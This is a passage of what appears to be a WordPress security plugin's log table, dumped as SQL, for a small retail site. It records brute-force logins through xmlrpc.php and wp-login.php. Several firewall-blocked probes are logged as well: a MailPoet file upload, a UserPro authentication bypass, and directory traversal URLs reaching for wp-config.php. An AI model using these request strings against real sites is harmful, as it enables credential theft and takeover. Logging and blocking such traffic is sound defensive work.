Firefox/62.0','loginFailValidUsername',NULL,NULL),(7676,0.000000,1629439397.719446,'\0\0\0\0\0\0\0\0\0\0���%{<',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7677,0.000000,1629439753.144188,'\0\0\0\0\0\0\0\0\0\0���\n�u',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7678,0.000000,1629440078.109904,'\0\0\0\0\0\0\0\0\0\0��Ǩf�',0,200,0,0,0,'https://www.teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0','loginFailInvalidUsername',NULL,NULL),(7679,0.000000,1629440154.207751,'\0\0\0\0\0\0\0\0\0\0��\\>cc',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7680,0.000000,1629440504.686598,'\0\0\0\0\0\0\0\0\0\0��D�\n9',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7681,0.000000,1629440752.236143,'\0\0\0\0\0\0\0\0\0\0��D��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7682,0.000000,1629440901.735450,'\0\0\0\0\0\0\0\0\0\0��3D(',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7683,0.000000,1629441274.709130,'\0\0\0\0\0\0\0\0\0\0��4��~',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7684,0.000000,1629441629.450210,'\0\0\0\0\0\0\0\0\0\0��/���',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7685,0.000000,1629442031.676104,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://www.teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0','loginFailInvalidUsername',NULL,NULL),(7686,0.000000,1629442806.212176,'\0\0\0\0\0\0\0\0\0\0���Ů�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7687,0.000000,1629443196.010586,'\0\0\0\0\0\0\0\0\0\0���VBe',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7688,0.000000,1629443227.690207,'\0\0\0\0\0\0\0\0\0\0���פ�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7689,0.000000,1629443531.706243,'\0\0\0\0\0\0\0\0\0\0���Gڿ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7690,0.000000,1629443927.886491,'\0\0\0\0\0\0\0\0\0\0����jQ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7691,0.000000,1629444271.479536,'\0\0\0\0\0\0\0\0\0\0��g�y�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7692,0.000000,1629444647.524699,'\0\0\0\0\0\0\0\0\0\0��gx��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7693,0.000000,1629445045.524913,'\0\0\0\0\0\0\0\0\0\0��O�-',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7694,0.000000,1629445433.773333,'\0\0\0\0\0\0\0\0\0\0��\rQ(',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7695,0.000000,1629445661.153204,'\0\0\0\0\0\0\0\0\0\0��#�� ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7696,0.000000,1629445802.573803,'\0\0\0\0\0\0\0\0\0\0���c{)',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7697,0.000000,1629446178.602788,'\0\0\0\0\0\0\0\0\0\0��@��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7698,0.000000,1629446562.345909,'\0\0\0\0\0\0\0\0\0\0��J�g�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7699,0.000000,1629446950.173092,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7700,0.000000,1629447344.732549,'\0\0\0\0\0\0\0\0\0\0��Ѷ�N',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7701,0.000000,1629447596.963471,'\0\0\0\0\0\0\0\0\0\0��-��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5','loginFailValidUsername',NULL,NULL),(7702,0.000000,1629447779.605349,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7703,0.000000,1629448156.670493,'\0\0\0\0\0\0\0\0\0\0���3',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7704,0.000000,1629448585.298310,'\0\0\0\0\0\0\0\0\0\0��\"Qq',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7705,0.000000,1629449003.910147,'\0\0\0\0\0\0\0\0\0\0���&V',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7706,0.000000,1629449417.593320,'\0\0\0\0\0\0\0\0\0\0����c',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7707,0.000000,1629449836.242073,'\0\0\0\0\0\0\0\0\0\0��k��2',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7708,0.000000,1629450262.392998,'\0\0\0\0\0\0\0\0\0\0��k��\n',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7709,0.000000,1629451123.239642,'\0\0\0\0\0\0\0\0\0\0����E.',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7710,0.000000,1629451544.895780,'\0\0\0\0\0\0\0\0\0\0��/�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7711,0.000000,1629451980.917841,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7712,0.000000,1629452416.999955,'\0\0\0\0\0\0\0\0\0\0���R-',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7713,0.000000,1629452874.849381,'\0\0\0\0\0\0\0\0\0\0����dl',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7714,0.000000,1629453312.605022,'\0\0\0\0\0\0\0\0\0\0����I',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7715,0.000000,1629453766.500428,'\0\0\0\0\0\0\0\0\0\0��P��o',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7716,0.000000,1629454191.907704,'\0\0\0\0\0\0\0\0\0\0���@r',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7717,0.000000,1629454652.986642,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,0,0,'https://www.teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0','loginFailInvalidUsername',NULL,NULL),(7718,0.000000,1629454674.719896,'\0\0\0\0\0\0\0\0\0\0��=�F�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7719,0.000000,1629455110.857638,'\0\0\0\0\0\0\0\0\0\0��ÚW�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7720,0.000000,1629455578.972821,'\0\0\0\0\0\0\0\0\0\0��ν�:',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7721,0.000000,1629456059.231153,'\0\0\0\0\0\0\0\0\0\0���w',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7722,1629456486.967527,1629456486.755100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(7723,0.000000,1629456535.915532,'\0\0\0\0\0\0\0\0\0\0��.e�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7724,1629456644.694894,1629456644.607500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7725,1629456744.167254,1629456743.623700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(7726,1629456768.092189,1629456767.817100,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://teethwhiteningproduct.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(7727,0.000000,1629457033.741187,'\0\0\0\0\0\0\0\0\0\0���l��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7728,0.000000,1629457498.649149,'\0\0\0\0\0\0\0\0\0\0����q',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7729,0.000000,1629457972.879923,'\0\0\0\0\0\0\0\0\0\0��Y\'�I',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7730,0.000000,1629458456.998718,'\0\0\0\0\0\0\0\0\0\0��ٓ�',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7731,0.000000,1629458478.706000,'\0\0\0\0\0\0\0\0\0\0��Ǩf�',0,200,0,0,0,'https://www.teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0','loginFailInvalidUsername',NULL,NULL),(7732,0.000000,1629458947.593136,'\0\0\0\0\0\0\0\0\0\0����\n',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7733,0.000000,1629459921.829256,'\0\0\0\0\0\0\0\0\0\0��n��',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7734,0.000000,1629460407.834085,'\0\0\0\0\0\0\0\0\0\0����L`',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7735,0.000000,1629460916.726603,'\0\0\0\0\0\0\0\0\0\0��#��w',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7736,0.000000,1629461274.149050,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7737,0.000000,1629461275.962286,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7738,0.000000,1629461277.075283,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7739,0.000000,1629461277.787355,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7740,0.000000,1629461278.979908,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7741,0.000000,1629461279.371820,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7742,0.000000,1629461280.658809,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7743,0.000000,1629461280.958562,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7744,0.000000,1629461282.364452,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7745,0.000000,1629461282.777497,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7746,0.000000,1629461283.950159,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7747,0.000000,1629461284.867801,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7748,0.000000,1629461286.158299,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7749,0.000000,1629461286.493515,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7750,0.000000,1629461287.773172,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7751,0.000000,1629461288.012176,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7752,0.000000,1629461289.411233,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7753,0.000000,1629461289.609259,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7754,0.000000,1629461290.962279,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,200,0,1,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','loginFailValidUsername',NULL,NULL),(7755,0.000000,1629461291.181232,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'',NULL),(7756,1629461294.236109,1629461294.168700,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//wp-login.php','https://teethwhiteningproduct.co.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1sb2dpbi5waHA=\"}'),(7757,1629461293.219578,1629461292.841100,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//wp-login.php','https://teethwhiteningproduct.co.uk//wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly93cC1sb2dpbi5waHA=\"}'),(7758,1629461292.533783,1629461292.465300,'\0\0\0\0\0\0\0\0\0\0��RfJ',0,503,0,0,0,'https://teethwhiteningproduct.co.uk//xmlrpc.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36','lockedOut','Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"Ly94bWxycGMucGhw\"}'),(7759,0.000000,1629461324.934822,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7760,0.000000,1629461373.454771,'\0\0\0\0\0\0\0\0\0\0���~d',0,200,0,0,0,'https://teethwhiteningproduct.co.uk/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(7761,0.000000,1629461405.482414,'\0\0\0\0\0\0\0\0\0\0��νUX',0,200,0,1,0,'https://teethwhiteningproduct.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; 